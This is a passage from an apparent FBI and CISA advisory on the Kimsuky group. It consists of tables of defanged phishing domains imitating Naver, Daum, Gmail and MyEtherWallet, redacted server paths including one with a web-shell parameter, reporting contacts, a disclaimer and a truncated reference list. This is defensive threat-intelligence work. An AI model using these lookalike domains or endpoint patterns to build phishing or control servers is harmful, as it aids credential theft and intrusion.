<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>member.daum.unikortv[.]com </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ns.onekorea[.]me</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.unikortv[.]com<span style=”color: black;”><font face=”Consolas”><font size=”3″><font style=”background-color: rgb(191, 191, 191);”> </font></font></font></span></code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>securetymail[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>riaver[.]site</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daum.unikortv[.]com<span style=”color: black;”><font face=”Consolas”><font size=”3″><font style=”background-color: rgb(191, 191, 191);”> </font></font></font></span></code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>help-navers[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>mailsnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daum.unikortv[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>beyondparallel.sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cloudmail[.]cloud</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”><code>member.daum.uniex[.]kr</code></td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>comment.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>helpnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>jonga[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>impression.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>view-naver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myaccounts.gmail.kr-infos[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>statement.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>view-hanmail[.]net</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.hol[.]es</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>demand.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.net-accounts[.]info</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>dept-dr.lab.hol[.]es</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sankei.sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read-hanmail[.]net</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Daurn.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sts.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>net.tm[.]ro</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Bigfile.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>hogy.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daum.net[.]pl</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Cdaum.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>kooo[.]gq </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>usernaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>eastsea.or[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>tiosuaking[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]ec</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myaccount.nkaac[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>help.unikoreas[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]mx</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.koreagov[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>resultview[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]se</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.onegov[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daum.unikftc[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]cm</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>member-authorize[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ww-naver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.com[.]se</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.unibok[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>vilene.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>csnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.unibok[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>amberalexander.ghtdev[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p><code>nidnaver[.]email</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read-naver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nidnaver[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cooper[.]center</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>dubai-1[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>coinone.co[.]in</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nidlogin.naver.corper[.]be</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>amberalexander.ghtdev[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]pl</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.corper[.]be</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>gloole[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver[.]cx</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naverdns[.]co</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>smtper[.]org</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>smtper[.]cz</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.co[.]in</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.kcrct[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myetherwallet.com[.]mx</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>downloadman06[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.outlook.kcrct[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myetherwallet.co[.]in </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>loadmanager07[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>top.naver.onekda[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-download[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-option[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-sslnet[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-vps[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-ssl[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>intemet[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>jp-ssl[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>org-vip[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sslserver[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ssltop[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>taplist[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>vpstop[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>webmain[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>preview.manage.org-view[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>intranet.ohchr.account-protect[.]work</code></p>
</td>
</tr>
</tbody>
</table>

<p style=”margin-bottom: 8px;”><font color=”#000000″><font size=”3″>&nbsp;</font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 2: Redacted domains used by Kimsuky</em></p>

<table style=”border: medium none; width: 737px; border-collapse: collapse; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td style=”padding: 0in 7px; border: 1px solid black; border-image: none; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?v%20an=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=102</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/up[.]php?id=NQDPDE</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/test/Update[.]php?wShell=201</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code><font color=”#000000″><font size=”3″>&nbsp;</font></font></code></p>
</td>
</tr>
</tbody>
</table>
<h3>Contact Information</h3><p style=”margin-top: 8px; margin-bottom: 8px;”>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.gov mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<div class=”special_container text-align-center”>&nbsp;</div>

<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>

<div class=”special_container”>&nbsp;</div>

<div class=”special_container”>
<p><em>This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>

<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p>
</div>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[1] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[2] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[3] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[4] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[5] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>[6] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[7] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>[8] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>[9] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href=”https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html”>[10] PwC: Tracking ‘Kimsuky’, the North Korea-based cyber espionage group: Part 2</a></li> <li><a href=”https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf”>[11] CrowdStrike: 2020 Global Threat Report</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[12] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[13] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”route:<nolink>”>[14] Private Sector Partner</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[15] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://blog.malwarebytes.com/threat-analysis/2020/04/apts-and-covid-19-how-advanced-persistent-threats-use-the-coronavirus-as-a-lure/”>[16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure</a></li> <li><a href=”https://www.cyberscoop.com/north-korea-accelerate-commercial-espionage-meet-kims-economic-deadline/”>[17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim’s economic deadline </a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[18] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[20] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://cyware.com/news/babyshark-malware-continues-to-target-nuclear-and-cryptocurrency-industries-40e04829″>[23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[24] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/”>[25] Palo Alto Networks Unit 42: BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat </a></li> <li><a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>[26] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[28] Netscout: Stolen Pencil Campaign Targets Academia</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[29] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a 